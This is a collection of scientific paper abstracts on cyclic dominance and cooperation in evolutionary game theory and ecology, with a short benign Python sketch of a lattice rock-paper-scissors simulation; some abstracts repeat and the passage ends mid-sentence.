Free-riders can invade a society of cooperators, causing a tragedy of the commons. Such social dilemmas can be overcome by positive or negative incentives. Even though an incentive-providing institution may protect a cooperative society from invasion by free-riders, it cannot always convert a society of free-riders to cooperation. In the latter case, both norms, cooperation and defection, are stable: To avoid a collapse to full defection, cooperators must be sufficiently numerous initially. A society of free-riders is then caught in a social trap, and the institution is unable to provide an escape, except at a high, possibly prohibitive cost. Here, we analyze the interplay of (a) incentives provided by institutions and (b) the effects of voluntary participation. We show that this combination fundamentally improves the efficiency of incentives. In particular, optional participation allows institutions punishing free-riders to overcome the social dilemma at a much lower cost, and to promote a globally stable regime of cooperation. This removes the social trap and implies that whenever a society of cooperators cannot be invaded by free-riders, it will necessarily become established in the long run, through social learning, irrespective of the initial number of cooperators. We also demonstrate that punishing provides a “lighter touch” than rewarding, guaranteeing full cooperation at considerably lower cost. 
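Several of the entries above study the same basic construction with Monte Carlo simulations: three strategies that dominate each other cyclically (for example cooperators, defectors, and loners) placed on a square lattice and updated by random invasion events. As a purely illustrative aid, a minimal sketch of such a cyclic-invasion update is given below; the lattice size, neighbourhood, and pure invasion rule are assumptions chosen for brevity and are not taken from any single paper cited here.

```python
import numpy as np

# Minimal illustrative sketch (not any cited paper's exact protocol):
# three strategies 0, 1, 2 dominate each other cyclically
# (0 beats 1, 1 beats 2, 2 beats 0) on an L x L square lattice with
# periodic boundaries and random sequential invasion updates.
rng = np.random.default_rng(0)
L = 32
lattice = rng.integers(0, 3, size=(L, L))
NEIGHBOURS = [(1, 0), (-1, 0), (0, 1), (0, -1)]

def mc_step(lattice, rng):
    """One Monte Carlo step = L*L elementary invasion attempts."""
    n = lattice.shape[0]
    for _ in range(n * n):
        x, y = rng.integers(0, n, size=2)
        dx, dy = NEIGHBOURS[rng.integers(0, 4)]
        nx, ny = (x + dx) % n, (y + dy) % n
        a, b = lattice[x, y], lattice[nx, ny]
        diff = (a - b) % 3
        if diff == 2:        # a preys on b in the 0 -> 1 -> 2 -> 0 cycle
            lattice[nx, ny] = a
        elif diff == 1:      # b preys on a
            lattice[x, y] = b

for _ in range(200):
    mc_step(lattice, rng)

# Strategy densities after the transient; on the lattice the three
# strategies coexist in slowly moving, self-organized domains.
print(np.bincount(lattice.ravel(), minlength=3) / (L * L))
```

The extensions discussed in the cited works (payoff-driven imitation, loner payoffs, reproduction onto empty sites, mobility, small-world rewiring) would replace the pure invasion rule above with the corresponding stochastic update, but the overall simulation loop has the same structure.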
--- paper_title: Optional contributions have positive effects for volunteering public goods games paper_content: Public goods (PG) games with the volunteering mechanism are referred to as volunteering public goods (VPG) games, in which loners are introduced to the PG games and a loner obtains a constant payoff without participating in the game. Considering that small contributions may have positive effects in encouraging more players with bounded rationality to contribute, this paper introduces optional contributions (high value or low value) to these typical VPG games: a cooperator can contribute a high or low payoff to the public pools. With the low contribution, the logit dynamics show that cooperation can be promoted in a well-mixed population compared to the typical VPG games; furthermore, when the multiplication factor is greater than a threshold, the average payoff of the population is also enhanced. In spatial VPG games, we introduce a new adjusting mechanism that is an approximation to best response. Some results in agreement with the prediction of the logit dynamics are found. These simulation results reveal that for VPG games the option of low contributions may be a better method to stimulate the growth of cooperation frequency and the average payoff of the population. --- paper_title: Altruistic Punishment and the Origin of Cooperation paper_content: How did human cooperation evolve? Recent evidence shows that many people are willing to engage in altruistic punishment, voluntarily paying a cost to punish noncooperators. Although this behavior helps to explain how cooperation can persist, it creates an important puzzle. If altruistic punishment provides benefits to nonpunishers and is costly to punishers, then how could it evolve? Drawing on recent insights from voluntary public goods games, I present a simple evolutionary model in which altruistic punishers can enter and will always come to dominate a population of contributors, defectors, and nonparticipants. The model suggests that the cycle of strategies in voluntary public goods games does not persist in the presence of punishment strategies. It also suggests that punishment can only enforce payoff-improving strategies, contrary to a widely cited “folk theorem” result that suggests that punishment can allow the evolution of any strategy. --- paper_title: Fixation and escape times in stochastic game learning paper_content: Evolutionary dynamics in finite populations is known to fixate eventually in the absence of mutation. We here show that a similar phenomenon can be found in stochastic game dynamical batch learning, and investigate fixation in learning processes in a simple 2×2 game, for two-player games with cyclic interaction, and in the context of the best-shot network game. The analogues of finite populations in evolution are here finite batches of observations between strategy updates. We study when and how such fixation can occur, and present results on the average time-to-fixation from numerical simulations. Simple cases are also amenable to analytical approaches and we provide estimates of the behaviour of so-called escape times as a function of the batch size. The differences and similarities with escape and fixation in evolutionary dynamics are discussed. --- paper_title: Impact of aging on the evolution of cooperation in the spatial prisoner's dilemma game paper_content: Aging is always present, tailoring our interactions with others, and postulating a finite lifespan during which we are able to exercise them. We consider the prisoner's dilemma game on a square lattice and examine how quenched age distributions and different aging protocols influence the evolution of cooperation when taking the life experience and knowledge accumulation into account as time passes. In agreement with previous studies, we find that a quenched assignment of age to players, introducing heterogeneity to the game, substantially promotes cooperative behavior. Introduction of aging and subsequent death as a coevolutionary process may act detrimentally on cooperation but enhances it efficiently if the offspring of individuals that have successfully passed their strategy is considered newborn. We study resulting age distributions of players and show that the heterogeneity is vital, yet insufficient, for explaining the observed differences in cooperator abundance on the spatial grid. The unexpected increment of cooperation levels can be explained by a dynamical effect that has a highly selective impact on the propagation of cooperator and defector states. --- paper_title: Intrinsic noise in game dynamical learning paper_content: Demographic noise has profound effects on evolutionary and population dynamics, as well as on chemical reaction systems and models of epidemiology. Such noise is intrinsic and due to the discreteness of the dynamics in finite populations. We here show that similar noise-sustained trajectories arise in game dynamical learning, where the stochasticity has a different origin: agents sample a finite number of moves of their opponents in between adaptation events. The limit of infinite batches results in deterministic modified replicator equations, whereas finite sampling leads to a stochastic dynamics. The characteristics of these fluctuations can be computed analytically using methods from statistical physics, and such noise can affect the attractors significantly, leading to noise-sustained cycling or removing periodic orbits of the standard replicator dynamics. --- paper_title: Spatial prisoner's dilemma game with volunteering in Newman-Watts small-world networks. paper_content: A modified spatial prisoner's dilemma game with voluntary participation in Newman-Watts small-world networks is studied. Some reasonable ingredients are introduced to the game evolutionary dynamics: each agent in the network is a pure strategist and can only take one of three strategies (cooperator, defector, and loner); its strategical transformation is associated with both the number of strategical states and the magnitude of average profits, which are adopted and acquired by its coplayers in the previous round of play; a stochastic strategy mutation is applied when it gets into the trouble of local commons that the agent and its neighbors are in the same state and get the same average payoffs. In the case of very low temptation to defect, it is found that agents are willing to participate in the game in the typical small-world region and intensive collective oscillations arise in the more random region. --- paper_title: The Joker effect: cooperation driven by destructive agents paper_content: Understanding the emergence of cooperation is a central issue in evolutionary game theory. The hardest setup for the attainment of cooperation in a population of individuals is the Public Goods game in which cooperative agents generate a common good at their own expenses, while defectors “free-ride” this good. Eventually this causes the exhaustion of the good, a situation which is bad for everybody. Previous results have shown that introducing reputation, allowing for volunteer participation, punishing defectors, rewarding cooperators or structuring agents, can enhance cooperation. Here we present a model which shows how the introduction of rare, malicious agents – that we term jokers – performing just destructive actions on the other agents induces bursts of cooperation. The appearance of jokers promotes a rock-paper-scissors dynamics, where jokers outbeat defectors and cooperators outperform jokers, which are subsequently invaded by defectors. Thus, paradoxically, the existence of destructive agents acting indiscriminately promotes cooperation. --- paper_title: Phase transitions for rock-scissors-paper game on different networks.
paper_content: Monte Carlo simulations and dynamical mean-field approximations are performed to study the phase transitions in the rock-scissors-paper game on different host networks. These graphs are originated from lattices by introducing quenched and annealed randomness simultaneously. In the resulting phase diagrams three different stationary states are identified for all structures. The comparison of results on different networks suggests that the value of the clustering coefficient plays an irrelevant role in the emergence of a global oscillating phase. The critical behavior of phase transitions seems to be universal and can be described by the same exponents. --- paper_title: Rock-scissors-paper game on regular small-world networks paper_content: The spatial rock-scissors-paper game (or cyclic Lotka–Volterra system) is extended to study how the spatiotemporal patterns are affected by the rewired host lattice providing uniform number of neighbours (degree) at each site. On the square lattice this system exhibits a self-organizing pattern with equal concentration of the competing strategies (species). If the quenched background is constructed by substituting random links for the nearest-neighbour bonds of a square lattice then a limit cycle occurs when the portion of random links exceeds a threshold value. This transition can also be observed if the standard link is replaced temporarily by a random one with a probability P at each step of iteration. Above a second threshold value of P the amplitude of global oscillation increases with time and finally the system reaches one of the homogeneous (absorbing) states. In this case the results of Monte Carlo simulations are compared with the predictions of the dynamical cluster technique evaluating all the configuration probabilities on one-, two-, four- and six-site clusters. --- paper_title: Cooperation for volunteering and partially random partnerships paper_content: Competition among cooperative, defective, and loner strategies is studied by considering an evolutionary prisoner's dilemma game for different partnerships. In this game each player can adopt one of its coplayer's strategy with a probability depending on the difference of payoffs coming from games with the corresponding coplayers. Our attention is focused on the effects of annealed and quenched randomness in the partnership for fixed number of coplayers. It is shown that only the loners survive if the four coplayers are chosen randomly (mean-field limit). On the contrary, on the square lattice all the three strategies are maintained by the cyclic invasions resulting in a self-organizing spatial pattern. If the fixed partnership is described by a regular small-world structure then a homogeneous oscillation occurs in the population dynamics when the measure of quenched randomness exceeds a threshold value. Similar behavior with higher sensitivity to the randomness is found if temporary partners are substituted for the standard ones with some probability at each step of iteration. --- paper_title: Phase transitions and volunteering in spatial public goods games. paper_content: We present a simple yet effective mechanism promoting cooperation under full anonymity by allowing for voluntary participation in public goods games. This natural extension leads to "rock-scissors-paper"-type cyclic dominance of the three strategies, cooperate, defect, and loner. 
In spatial settings with players arranged on a regular lattice, this results in interesting dynamical properties and intriguing spatiotemporal patterns. In particular, variations of the value of the public good leads to transitions between one-, two-, and three-strategy states which either are in the class of directed percolation or show interesting analogies to Ising-type models. Although volunteering is incapable of stabilizing cooperation, it efficiently prevents successful spreading of selfish behavior. --- paper_title: Stability and robustness analysis of cooperation cycles driven by destructive agents in finite populations paper_content: The emergence and promotion of cooperation are two of the main issues in evolutionary game theory, as cooperation is amenable to exploitation by defectors, which take advantage of cooperative individuals at no cost, dooming them to extinction. It has been recently shown that the existence of purely destructive agents (termed jokers) acting on the common enterprises (public goods games) can induce stable limit cycles among cooperation, defection, and destruction when infinite populations are considered. These cycles allow for time lapses in which cooperators represent a relevant fraction of the population, providing a mechanism for the emergence of cooperative states in nature and human societies. Here we study analytically and through agent-based simulations the dynamics generated by jokers in finite populations for several selection rules. Cycles appear in all cases studied, thus showing that the joker dynamics generically yields a robust cyclic behavior not restricted to infinite populations. We also compute the average time in which the population consists mostly of just one strategy and compare the results with numerical simulations. --- paper_title: Phase diagrams for the spatial public goods game with pool-punishment paper_content: The efficiency of institutionalized punishment is studied by evaluating the stationary states in the spatial public goods game comprising unconditional defectors, cooperators, and cooperating pool punishers as the three competing strategies. Fines and costs of pool punishment are considered as the two main parameters determining the stationary distributions of strategies on the square lattice. Each player collects a payoff from five five-person public goods games, and the evolution of strategies is subsequently governed by imitation based on pairwise comparisons at a low level of noise. The impact of pool punishment on the evolution of cooperation in structured populations is significantly different from that reported previously for peer punishment. Representative phase diagrams reveal remarkably rich behavior, depending also on the value of the synergy factor that characterizes the efficiency of investments payed into the common pool. Besides traditional single- and two-strategy stationary states, a rock-paper-scissors type of cyclic dominance can emerge in strikingly different ways. --- paper_title: The Economics of Fair Play. paper_content: Imagine that somebody offers you $100. All you have to do is agree with some other anonymous person on how to share the sum. The rules are strict. The two of you are in separate rooms and cannot exchange information. A coin toss decides which of you will propose how to share the money. Suppose that you are the proposer. You can make a single offer of how to split the sum, and the other person-the responder-can say yes or no. 
The responder also knows the rules and the total amount of money at stake. If her answer is yes, the deal goes ahead. If her answer is no, neither of you gets anything. In both cases, the game is over and will not be repeated. What will you do? Instinctively, many people feel they should offer 50 percent, because such a division is "fair" and therefore likely to be accepted. More daring people, however, think they might get away with offering somewhat less than half of the sum. --- paper_title: Defense mechanisms of empathetic players in the spatial ultimatum game paper_content: Experiments on the ultimatum game have revealed that humans are remarkably fond of fair play. When asked to share an amount of money, unfair offers are rare and their acceptance rate small. While empathy and spatiality may lead to the evolution of fairness, thus far considered continuous strategies have precluded the observation of solutions that would be driven by pattern formation. Here we introduce a spatial ultimatum game with discrete strategies, and we show that this simple alteration opens the gate to fascinatingly rich dynamical behavior. In addition to mixed stationary states, we report the occurrence of traveling waves and cyclic dominance, where one strategy in the cycle can be an alliance of two strategies. The highly webbed phase diagram, entailing continuous and discontinuous phase transitions, reveals hidden complexity in the pursuit of human fair play. --- paper_title: Evolutionary conservation of species' roles in food webs. paper_content: Studies of ecological networks (the web of interactions between species in a community) demonstrate an intricate link between a community's structure and its long-term viability. It remains unclear, however, how much a community's persistence depends on the identities of the species present, or how much the role played by each species varies as a function of the community in which it is found. We measured species' roles by studying how species are embedded within the overall network and the subsequent dynamic implications. Using data from 32 empirical food webs, we find that species' roles and dynamic importance are inherent species attributes and can be extrapolated across communities on the basis of taxonomic classification alone. Our results illustrate the variability of roles across species and communities and the relative importance of distinct species groups when attempting to conserve ecological communities. --- paper_title: Spirals and coarsening patterns in the competition of many species: A complex Ginzburg-Landau approach paper_content: In order to model real ecological systems one has to consider many species that interact in complex ways. However, most of the recent theoretical studies have been restricted to few species systems with rather trivial interactions. The few studies dealing with a larger number of species and/or more complex interaction schemes are mostly restricted to numerical explorations. In this paper we determine, starting from the deterministic mean-field rate equations, for large classes of systems the space of coexistence fixed points at which biodiversity is maximal. For systems with a single coexistence fixed point we derive complex Ginzburg–Landau equations that allow one to describe the space-time patterns realized in two space dimensions. For selected cases we compare the theoretical predictions with the pattern observed in numerical simulations.
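For orientation, the end point of derivations like the one sketched in the preceding abstract is usually written in the generic, normalized form of the complex Ginzburg-Landau equation given below. This display is added here only as a reminder; the real parameters b and c (and the rescalings of space and time) depend on the underlying reaction rates and are not taken from the cited paper:

\partial_t A(\mathbf{r},t) = A + (1 + i b)\,\nabla^2 A - (1 + i c)\,|A|^2 A ,

where A is a complex order parameter built from the deviations of the species densities from the coexistence fixed point. The existence and stability of spiral waves are then read off from the location of (b, c) in the standard CGLE phase diagram.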
--- paper_title: Globally synchronized oscillations in complex cyclic games paper_content: The rock-paper-scissors game and its generalizations with S>3 species are well-studied models for cyclically interacting populations. Four is, however, the minimum number of species that, by allowing other interactions beyond the single, cyclic loop, breaks both the full intransitivity of the food graph and the one-predator, one-prey symmetry. Lütz et al. [J. Theor. Biol. 317, 286 (2013)] have shown the existence, on a square lattice, of two distinct phases, with either four or three coexisting species. In both phases, each agent is eventually replaced by one of its predators, but these strategy oscillations remain localized as long as the interactions are short ranged. Distant regions may be either out of phase or cycling through different food-web subloops (if any). Here we show that upon replacing a minimum fraction Q of the short-range interactions by long-range ones, there is a Hopf bifurcation, and global oscillations become stable. Surprisingly, to build such long-distance, global synchronization, the four-species coexistence phase requires fewer long-range interactions than the three-species phase, while one would naively expect the opposite to be true. Moreover, deviations from highly homogeneous conditions (χ=0 or 1) increase Qc, and the more heterogeneous is the food web, the harder the synchronization is. By further increasing Q, while the three-species phase remains stable, the four-species one has a transition to an absorbing, single-species state. The existence of a phase with global oscillations for S>3, when the interaction graph has multiple subloops and several possible local cycles, leads to the conjecture that global oscillations are a general characteristic, even for large, realistic food webs. --- paper_title: Competing associations in six-species predator-prey models paper_content: We study a set of six-species ecological models where each species has two predators and two prey. On a square lattice the time evolution is governed by iterated invasions between the neighbouring predator–prey pairs chosen at random and by a site exchange with a probability Xs between the neutral pairs. These models involve the possibility of spontaneous formation of different defensive alliances whose members protect each other from the external invaders. The Monte Carlo simulations show a surprisingly rich variety of the stable spatial distributions of species and subsequent phase transitions when tuning the control parameter Xs. These very simple models are able to demonstrate that the competition between these associations influences their composition. Sometimes the dominant association is developed via a domain growth. In other cases larger and larger invasion processes precede the prevalence of one of the stable associations. Under some conditions the survival of all the species can be maintained by the cyclic dominance occurring between these associations. --- paper_title: Network structure, predator–prey modules, and stability in large food webs paper_content: Large, complex networks of ecological interactions with random structure tend invariably to instability. This mathematical relationship between complexity and local stability ignited a debate that has populated ecological literature for more than three decades. Here we show that, when species interact as predators and prey, systems as complex as the ones observed in nature can still be stable. 
Moreover, stability is highly robust to perturbations of interaction strength, and is largely a property of structure driven by predator–prey loops with the stability of these small modules cascading into that of the whole network. These results apply to empirical food webs and models that mimic the structure of natural systems as well. These findings are also robust to the inclusion of other types of ecological links, such as mutualism and interference competition, as long as consumer–resource interactions predominate. These considerations underscore the influence of food web structure on ecological dynamics and challenge the current view of interaction strength and long cycles as main drivers of stability in natural communities. --- paper_title: Fixation in a cyclic Lotka-Volterra model paper_content: We study a cyclic Lotka-Volterra model of N interacting species populating a d-dimensional lattice. In the realm of a Kirkwood approximation, a critical number of species N_c(d) above which the system fixates is determined analytically. We find N_c=5,14,23 in dimensions d=1,2,3, in remarkably good agreement with simulation results in two dimensions. --- paper_title: Coexistence and Survival in Conservative Lotka-Volterra Networks paper_content: Analyzing coexistence and survival scenarios of Lotka-Volterra (LV) networks in which the total biomass is conserved is of vital importance for the characterization of long-term dynamics of ecological communities. Here, we introduce a classification scheme for coexistence scenarios in these conservative LV models and quantify the extinction process by employing the Pfaffian of the network's interaction matrix. We illustrate our findings on global stability properties for general systems of four and five species and find a generalized scaling law for the extinction time. --- paper_title: A competitive network theory of species diversity. paper_content: Nonhierarchical competition between species has been proposed as a potential mechanism for biodiversity maintenance, but theoretical and empirical research has thus far concentrated on systems composed of relatively few species. Here we develop a theory of biodiversity based on a network representation of competition for systems with large numbers of competitors. All species pairs are connected by an arrow from the inferior to the superior. Using game theory, we show how the equilibrium density of all species can be derived from the structure of the network. We show that when species are limited by multiple factors, the coexistence of a large number of species is the most probable outcome and that habitat heterogeneity interacts with network structure to favor diversity. --- paper_title: Interaction strengths in food webs : issues and opportunities paper_content: Summary 1. Recent efforts to understand how the patterning of interaction strength affects both structure and dynamics in food webs have highlighted several obstacles to productive synthesis. Issues arise with respect to goals and driving questions, methods and approaches, and placing results in the context of broader ecological theory. 2. Much confusion stems from lack of clarity about whether the questions posed relate to community-level patterns or to species dynamics, and to what authors actually mean by the term ‘interaction strength’. Here, we describe the various ways in which this term has been applied and discuss the implications of loose terminology and definition for the development of this field. 3. 
Of particular concern is the clear gap between theoretical and empirical investigations of interaction strengths and food web dynamics. The ecological community urgently needs to explore new ways to estimate biologically reasonable model coefficients from empirical data, such as foraging rates, body size, metabolic rate, biomass distribution and other species traits. 4. Combining numerical and analytical modelling approaches should allow exploration of the conditions under which different interaction strengths metrics are interchangeable with regard to relative magnitude, system responses, and species identity. 5. Finally, the prime focus on predator-prey links in much of the research to date on interaction strengths in food webs has meant that the potential significance of nontrophic interactions, such as competition, facilitation and biotic disturbance, has been largely ignored by the food web community. Such interactions may be important dynamically and should be routinely included in future food web research programmes. --- paper_title: A General Model for Food Web Structure paper_content: A central problem in ecology is determining the processes that shape the complex networks known as food webs formed by species and their feeding relationships. The topology of these networks is a major determinant of ecosystems' dynamics and is ultimately responsible for their responses to human impacts. Several simple models have been proposed for the intricate food webs observed in nature. We show that the three main models proposed so far fail to fully replicate the empirical data, and we develop a likelihood-based approach for the direct comparison of alternative models based on the full structure of the network. Results drive a new model that is able to generate all the empirical data sets and to do so with the highest likelihood. --- paper_title: Defensive alliances in spatial models of cyclical population interactions paper_content: As a generalization of the three-strategy Rock-Scissors-Paper game dynamics in space, cyclical interaction models of six mutating species are studied on a square lattice, in which each species is supposed to have two dominant, two subordinated, and a neutral interacting partner. Depending on their interaction topologies, all imaginable systems can be classified into four (isomorphic) groups exhibiting significantly different behaviors as a function of mutation rate. In three out of four cases three (or four) species form defensive alliances that maintain themselves in a self-organizing polydomain structure via cyclic invasions. Varying the mutation rate, this mechanism results in an ordering phenomenon analogous to that of magnetic Ising systems. The model explains a very basic mechanism of community organization, which might gain important applications in biology, economics, and sociology. --- paper_title: Extinction in four species cyclic competition paper_content: When four species compete stochastically in a cyclic way, the formation of two teams of mutually neutral partners is observed. In this paper we study through numerical simulations the extinction processes that can take place in this system both in the well mixed case as well as on different types of lattices. The different routes to extinction are revealed by the probability distribution of the domination time, i.e. the time needed for one team to fully occupy the system.
If swapping is allowed between neutral partners, then the probability distribution is dominated by very long-lived states where a few very large domains persist, each domain being occupied by a mix of individuals from species that form one of the teams. Many aspects of the possible extinction scenarios are lost when only considering averaged quantities, such as for example the mean domination time. --- paper_title: Globally synchronized oscillations in complex cyclic games paper_content: The rock-paper-scissors game and its generalizations with S>3 species are well-studied models for cyclically interacting populations. Four is, however, the minimum number of species that, by allowing other interactions beyond the single, cyclic loop, breaks both the full intransitivity of the food graph and the one-predator, one-prey symmetry. Lütz et al. [J. Theor. Biol. 317, 286 (2013)] have shown the existence, on a square lattice, of two distinct phases, with either four or three coexisting species. In both phases, each agent is eventually replaced by one of its predators, but these strategy oscillations remain localized as long as the interactions are short ranged. Distant regions may be either out of phase or cycling through different food-web subloops (if any). Here we show that upon replacing a minimum fraction Q of the short-range interactions by long-range ones, there is a Hopf bifurcation, and global oscillations become stable. Surprisingly, to build such long-distance, global synchronization, the four-species coexistence phase requires fewer long-range interactions than the three-species phase, while one would naively expect the opposite to be true. Moreover, deviations from highly homogeneous conditions (χ=0 or 1) increase Qc, and the more heterogeneous is the food web, the harder the synchronization is. By further increasing Q, while the three-species phase remains stable, the four-species one has a transition to an absorbing, single-species state. The existence of a phase with global oscillations for S>3, when the interaction graph has multiple subloops and several possible local cycles, leads to the conjecture that global oscillations are a general characteristic, even for large, realistic food webs. --- paper_title: Three- and four-state rock-paper-scissors games with diffusion paper_content: Cyclic dominance of three species is a commonly occurring interaction dynamics, often denoted the rock-paper-scissors (RPS) game. Such a type of interactions is known to promote species coexistence. Here, we generalize recent results of Reichenbach [Nature (London) 448, 1046 (2007)] of a four-state variant of the RPS game. We show that spiral formation takes place only without a conservation law for the total density. Nevertheless, in general, fast diffusion can destroy species coexistence. We also generalize the four-state model to slightly varying reaction rates. This is shown both analytically and numerically not to change pattern formation, or the effective wavelength of the spirals, and therefore not to alter the qualitative properties of the crossover to extinction. --- paper_title: Cyclic competition of four species: mean field theory and stochastic evolution paper_content: Generalizing the cyclically competing three-species model (often referred to as the rock-paper-scissors game), we consider a simple system of population dynamics without spatial structures that involves four species. Unlike the previous model, the four form alliance pairs which resemble partnership in the game of Bridge. 
In a finite system with discrete stochastic dynamics, all but 4 of the absorbing states consist of coexistence of a partner-pair. From a master equation, we derive a set of mean field equations of evolution. This approach predicts complex time dependence of the system and that the surviving partner-pair is the one with the larger product of their strengths (rates of consumption). Simulations typically confirm these scenarios. Beyond that, much richer behavior is revealed, including complicated extinction probabilities and non-trivial distributions of the population ratio in the surviving pair. These discoveries naturally raise a number of intriguing questions, which in turn suggests a variety of future avenues of research, especially for more realistic models of multispecies competition in nature. --- paper_title: Cyclic competition of four species: domains and interfaces paper_content: We study numerically domain growth and interface fluctuations in one- and two-dimensional lattice systems composed of four species that interact in a cyclic way. Particle mobility is implemented through exchanges of particles located on neighboring lattice sites. For the chain we find that the details of the domain growth strongly depend on the mobility, with a higher mobility yielding a larger effective domain growth exponent. In two space dimensions, when also exchanges between mutually neutral particles are possible, both domain growth and interface fluctuations display universal regimes that are independent of the predation and exchange rates. --- paper_title: Coexistence and Survival in Conservative Lotka-Volterra Networks paper_content: Analyzing coexistence and survival scenarios of Lotka-Volterra (LV) networks in which the total biomass is conserved is of vital importance for the characterization of long-term dynamics of ecological communities. Here, we introduce a classification scheme for coexistence scenarios in these conservative LV models and quantify the extinction process by employing the Pfaffian of the network's interaction matrix. We illustrate our findings on global stability properties for general systems of four and five species and find a generalized scaling law for the extinction time. --- paper_title: Theory of phase ordering kinetics paper_content: The theory of phase ordering kinetics is reviewed, and new results for systems with continuous symmetry presented. A generalisation of “Porod's law” for the tail of the structure factor, of the form S(k, t) ∼ k−(d+n)L(t)−n for kL(t) ≫ 1, where L(t) is the characteristic length scale at time t after the quench, is derived where, for a vector order parameter, n is simply the number of components of the vector. The power-law tail is shown to be associated with topological defects in the field, and its amplitude is calculated exactly in terms of the defect density. For a conserved vector order parameter the multiscaling form obtained for n = ∞ is argued to be special to this limit. Using an approximate theory due to Mazenko, it is shown that conventional scaling is recovered, for any finite n, when t→∞, with L(t)∼ (tln n)14 for n large. --- paper_title: Saddles, Arrows, and Spirals: Deterministic Trajectories in Cyclic Competition of Four Species paper_content: Population dynamics in systems composed of cyclically competing species has been of increasing interest recently. Here we investigate a system with four or more species. Using mean field theory, we study in detail the trajectories in configuration space of the population fractions. 
We discover a variety of orbits, shaped like saddles, spirals, and straight lines. Many of their properties are found explicitly. Most remarkably, we identify a collective variable that evolves simply as an exponential: Q ∝ e(λt), where λ is a function of the reaction rates. It provides information on the state of the system for late times (as well as for t→-∞). We discuss implications of these results for the evolution of a finite, stochastic system. A generalization to an arbitrary number of cyclically competing species yields valuable insights into universal properties of such systems. --- paper_title: Intransitivity and coexistence in four species cyclic games paper_content: Intransitivity is a property of connected, oriented graphs representing species interactions that may drive their coexistence even in the presence of competition, the standard example being the three species Rock-Paper-Scissors game. We consider here a generalization with four species, the minimum number of species allowing other interactions beyond the single loop (one predator, one prey). We show that, contrary to the mean field prediction, on a square lattice the model presents a transition, as the parameter setting the rate at which one species invades another changes, from a coexistence to a state in which one species gets extinct. Such a dependence on the invasion rates shows that the interaction graph structure alone is not enough to predict the outcome of such models. In addition, different invasion rates permit to tune the level of transitiveness, indicating that for the coexistence of all species to persist, there must be a minimum amount of intransitivity. --- paper_title: Phase transitions induced by variation of invasion rates in spatial cyclic predator-prey models with four or six species paper_content: Cyclic predator-prey models with four or six species are studied on a square lattice when the invasion rates are varied. It is found that the cyclic invasions maintain a self-organizing pattern as long as the deviation of the invasion rate(s) from a uniform value does not exceed a threshold value. For larger deviations the system exhibits a continuous phase transition into a frozen distribution of odd (or even) label species. --- paper_title: From pairwise to group interactions in games of cyclic dominance paper_content: We study the rock-paper-scissors game in structured populations, where the invasion rates determine individual payoffs that govern the process of strategy change. The traditional version of the game is recovered if the payoffs for each potential invasion stem from a single pairwise interaction. However, the transformation of invasion rates to payoffs also allows the usage of larger interaction ranges. In addition to the traditional pairwise interaction, we therefore consider simultaneous interactions with all nearest neighbors, as well as with all nearest and next-nearest neighbors, thus effectively going from single pair to group interactions in games of cyclic dominance. We show that differences in the interaction range affect not only the stationary fractions of strategies, but also their relations of dominance. The transition from pairwise to group interactions can thus decelerate and even revert the direction of the invasion between the competing strategies. Like in evolutionary social dilemmas, in games of cyclic dominance too the indirect multipoint interactions that are due to group interactions hence play a pivotal role. 
Our results indicate that, in addition to the invasion rates, the interaction range is at least as important for the maintenance of biodiversity among cyclically competing strategies. --- paper_title: Mobility-Dependent Selection of Competing Strategy Associations paper_content: Standard models of population dynamics focus on the interaction, survival, and extinction of the competing species individually. Real ecological systems, however, are characterized by an abundance of species (or strategies, in the terminology of evolutionary-game theory) that form intricate, complex interaction networks. The description of the ensuing dynamics may be aided by studying associations of certain strategies rather than individual ones. Here we show how such a higher-level description can bear fruitful insight. Motivated from different strains of colicinogenic Escherichia coli bacteria, we investigate a four-strategy system which contains a three-strategy cycle and a neutral alliance of two strategies. We find that the stochastic, spatial model exhibits a mobility-dependent selection of either the three-strategy cycle or of the neutral pair. We analyze this intriguing phenomenon numerically and analytically. --- paper_title: Diverging fluctuations in a spatial five-species cyclic dominance game paper_content: A five-species predator-prey model is studied on a square lattice where each species has two prey and two predators on the analogy to the rock-paper-scissors-lizard-Spock game. The evolution of the spatial distribution of species is governed by site exchange and invasion between the neighboring predator-prey pairs, where the cyclic symmetry can be characterized by two different invasion rates. The mean-field analysis has indicated periodic oscillations in the species densities with a frequency becoming zero for a specific ratio of invasion rates. When varying the ratio of invasion rates, the appearance of this zero-eigenvalue mode is accompanied by neutrality between the species associations. Monte Carlo simulations of the spatial system reveal diverging fluctuations at a specific invasion rate, which can be related to the vanishing dominance between all pairs of species associations. --- paper_title: Spatial coherence resonance in excitable media paper_content: We study the phenomenon of spatial coherence resonance in a two-dimensional model of excitable media with FitzHugh-Nagumo local dynamics. In particular, we show that there exists an optimal level of additive noise for which an inherent spatial scale of the excitable media is best pronounced. We argue that the observed phenomenon occurs due to the existence of a noise robust excursion time that is characteristic for the local dynamics whereby the diffusion constant, representing the rate of diffusive spread, determines the actual resonant spatial frequency. Additionally, biological implications of presented results in the field of neuroscience are outlined. --- paper_title: Mobility promotes and jeopardizes biodiversity in rock-paper-scissors games paper_content: Biodiversity is essential to the viability of ecological systems. Species diversity in ecosystems is promoted by cyclic, non-hierarchical interactions among competing populations. Such non-transitive relations lead to an evolution with central features represented by the `rock-paper-scissors' game, where rock crushes scissors, scissors cut paper, and paper wraps rock. 
In combination with spatial dispersal of static populations, this type of competition results in the stable coexistence of all species and the long-term maintenance of biodiversity. However, population mobility is a central feature of real ecosystems: animals migrate, bacteria run and tumble. Here, we observe a critical influence of mobility on species diversity. When mobility exceeds a certain value, biodiversity is jeopardized and lost. In contrast, below this critical threshold all subpopulations coexist and an entanglement of travelling spiral waves forms in the course of temporal evolution. We establish that this phenomenon is robust, it does not depend on the details of cyclic competition or spatial environment. These findings have important implications for maintenance and evolution of ecological systems and are relevant for the formation and propagation of patterns in excitable media, such as chemical kinetics or epidemic outbreaks. --- paper_title: Evolutionary dynamics of group interactions on structured populations: A review paper_content: Interactions among living organisms, from bacteria colonies to human societies, are inherently more complex than interactions among particles and non-living matter. Group interactions are a particularly important and widespread class, representative of which is the public goods game. In addition, methods of statistical physics have proved valuable for studying pattern formation, equilibrium selection and self-organization in evolutionary games. Here, we review recent advances in the study of evolutionary dynamics of group interactions on top of structured populations, including lattices, complex networks and coevolutionary models. We also compare these results with those obtained on well-mixed populations. The review particularly highlights that the study of the dynamics of group interactions, like several other important equilibrium and non-equilibrium dynamical processes in biological, economical and social sciences, benefits from the synergy between statistical physics, network science and evolutionary game theory. --- paper_title: Competing associations in six-species predator-prey models paper_content: We study a set of six-species ecological models where each species has two predators and two prey. On a square lattice the time evolution is governed by iterated invasions between the neighbouring predator–prey pairs chosen at random and by a site exchange with a probability Xs between the neutral pairs. These models involve the possibility of spontaneous formation of different defensive alliances whose 